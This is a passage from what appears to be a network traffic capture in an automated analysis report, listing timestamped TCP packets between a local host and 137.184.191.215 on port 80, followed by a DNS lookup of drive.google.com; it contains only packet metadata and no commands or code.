                                Sep 30, 2024 10:03:54.406861067 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:54.406913042 CEST4974780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:54.414233923 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.201477051 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.201495886 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.201508045 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.201520920 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.201529026 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.201550007 CEST4974780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.201587915 CEST4974780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.201786041 CEST4974780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.206520081 CEST8049747137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.363270998 CEST4974880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.368216038 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.368285894 CEST4974880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.370493889 CEST4974880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.375243902 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:03:57.375312090 CEST4974880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:03:57.380157948 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.028433084 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.028454065 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.028465033 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.028475046 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.028599024 CEST4974880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:00.028791904 CEST4974880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:00.033529997 CEST8049748137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.178385019 CEST4974980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:00.183315992 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.183413982 CEST4974980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:00.185600996 CEST4974980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:00.190402031 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:00.190479040 CEST4974980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:00.196269989 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.782263041 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.782322884 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.782344103 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.782367945 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.782457113 CEST4974980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:02.782712936 CEST4974980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:02.787553072 CEST8049749137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.920722961 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:02.925743103 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.925846100 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:02.928149939 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:02.932979107 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:02.933068991 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:02.938018084 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.519123077 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.519140959 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.519151926 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.519161940 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.519175053 CEST8049750137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.519273043 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.519321918 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.519550085 CEST4975080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.665589094 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.670521975 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.670629978 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.673099995 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.678018093 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:05.678112984 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:05.683043003 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.226331949 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.226350069 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.226362944 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.226376057 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.226408958 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.226457119 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.226600885 CEST4975180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.231306076 CEST8049751137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.375157118 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.380086899 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.380201101 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.382426977 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.387263060 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:08.387339115 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:08.392062902 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:10.927911997 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:10.927932024 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:10.927943945 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:10.927954912 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:10.928109884 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:10.928109884 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:10.928193092 CEST8049752137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:10.928234100 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:10.928247929 CEST4975280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:11.068253994 CEST4975380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:11.073184013 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:11.073261976 CEST4975380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:11.076231956 CEST4975380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:11.081063986 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:11.081114054 CEST4975380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:11.085902929 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.629993916 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.630017996 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.630032063 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.630043030 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.630115032 CEST4975380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:13.630281925 CEST4975380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:13.635641098 CEST8049753137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.765621901 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:13.770561934 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.770701885 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:13.772979975 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:13.777796030 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:13.777858973 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:13.782713890 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.314459085 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.314480066 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.314491034 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.314538002 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.314781904 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.315134048 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.315171957 CEST4975480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.319555998 CEST8049754137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.452125072 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.457819939 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.457928896 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.460316896 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.465199947 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:16.465295076 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:16.470098019 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.040237904 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.040257931 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.040275097 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.040286064 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.040369987 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.040422916 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.040647984 CEST4975580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.045397997 CEST8049755137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.187371016 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.192358971 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.192434072 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.194720030 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.199559927 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:19.199610949 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:19.204525948 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:21.852612019 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:21.852628946 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:21.852639914 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:21.852698088 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:21.852938890 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:21.853002071 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:21.853427887 CEST4975680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:21.863846064 CEST8049756137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:22.004296064 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:22.015166044 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:22.015294075 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:22.017584085 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:22.028223991 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:22.028390884 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:22.038696051 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.553879023 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.553898096 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.553910017 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.553922892 CEST8049757137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.554059029 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.554157019 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.554290056 CEST4975780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.835762978 CEST4975880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.840619087 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.840717077 CEST4975880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.885512114 CEST4975880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.890470982 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:24.890573025 CEST4975880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:24.895478964 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.506804943 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.506836891 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.506848097 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.506861925 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.506983995 CEST4975880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:27.510194063 CEST4975880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:27.515172005 CEST8049758137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.766840935 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:27.771847010 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.771946907 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:27.774245977 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:27.779066086 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:27.779108047 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:27.783951044 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424139977 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424155951 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424168110 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424179077 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424192905 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424206018 CEST8049759137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.424231052 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.424278975 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.424474955 CEST4975980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.565433025 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.570384026 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.570456028 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.572695017 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.577517986 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:30.577567101 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:30.582336903 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.235300064 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.235312939 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.235327005 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.235333920 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.235379934 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.235441923 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.235632896 CEST4976080192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.240406990 CEST8049760137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.382190943 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.389430046 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.389545918 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.396735907 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.404422045 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:33.404478073 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:33.409296989 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.025727034 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.025752068 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.025772095 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.025784969 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.025872946 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.025873899 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.026046991 CEST4976180192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.030968904 CEST8049761137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.547400951 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.552449942 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.552565098 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.555095911 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.559933901 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:36.560029984 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:36.564846039 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.113044977 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.113107920 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.113146067 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.113166094 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.113183022 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.113239050 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.113509893 CEST4976280192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.118326902 CEST8049762137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.350239992 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.355179071 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.355247974 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.357562065 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.362436056 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:39.362493992 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:39.367347002 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:41.940439939 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:41.940453053 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:41.940459013 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:41.940465927 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:41.940598965 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:41.940654039 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:41.940761089 CEST4976380192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:41.945477962 CEST8049763137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:42.097238064 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:42.102241993 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:42.102345943 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:42.104583025 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:42.109363079 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:42.109431028 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:42.114222050 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.759974957 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.759998083 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.760010004 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.760020971 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.760076046 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.760118008 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.760288954 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.760305882 CEST8049764137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.760344982 CEST4976480192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.908786058 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.914468050 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.914549112 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.916829109 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.921613932 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:44.921691895 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.926491022 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588433981 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588480949 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588502884 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588536024 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588536978 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.588556051 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588582993 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.588593960 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.588715076 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.737379074 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.742569923 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.742722034 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.745021105 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.749893904 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.749965906 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.754801989 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.391940117 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.391962051 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.391974926 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.392059088 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.392277002 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.392585993 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.396008015 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.397133112 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.531420946 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.536330938 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.540013075 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.542316914 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.547060966 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.551239014 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.556101084 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167238951 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167262077 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167319059 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167318106 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.167332888 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167375088 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.167795897 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.177093983 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.309596062 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.314659119 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.314740896 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.316770077 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.321604967 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.321681023 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.326546907 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967161894 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967178106 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967189074 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967201948 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967251062 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:55.967288017 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:55.967724085 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:55.972449064 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:56.107012033 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.111849070 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:56.111938000 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.114135981 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.118971109 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:56.119034052 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.123833895 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.721940041 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.721962929 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.721973896 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.722040892 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:58.722254038 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.722305059 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:05:00.626013994 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:05:00.630937099 CEST8049769137.184.191.215192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 30, 2024 10:02:50.114861012 CEST6405453192.168.2.41.1.1.1
                                Sep 30, 2024 10:02:50.121891022 CEST53640541.1.1.1192.168.2.4
                                Sep 30, 2024 10:02:51.157027006 CEST5296753192.168.2.41.1.1.1
                                Sep 30, 2024 10:02:51.164002895 CEST53529671.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Sep 30, 2024 10:02:50.114861012 CEST192.168.2.41.1.1.10x1ebcStandard query (0)drive.google.comA (IP address)IN (0x0001)false
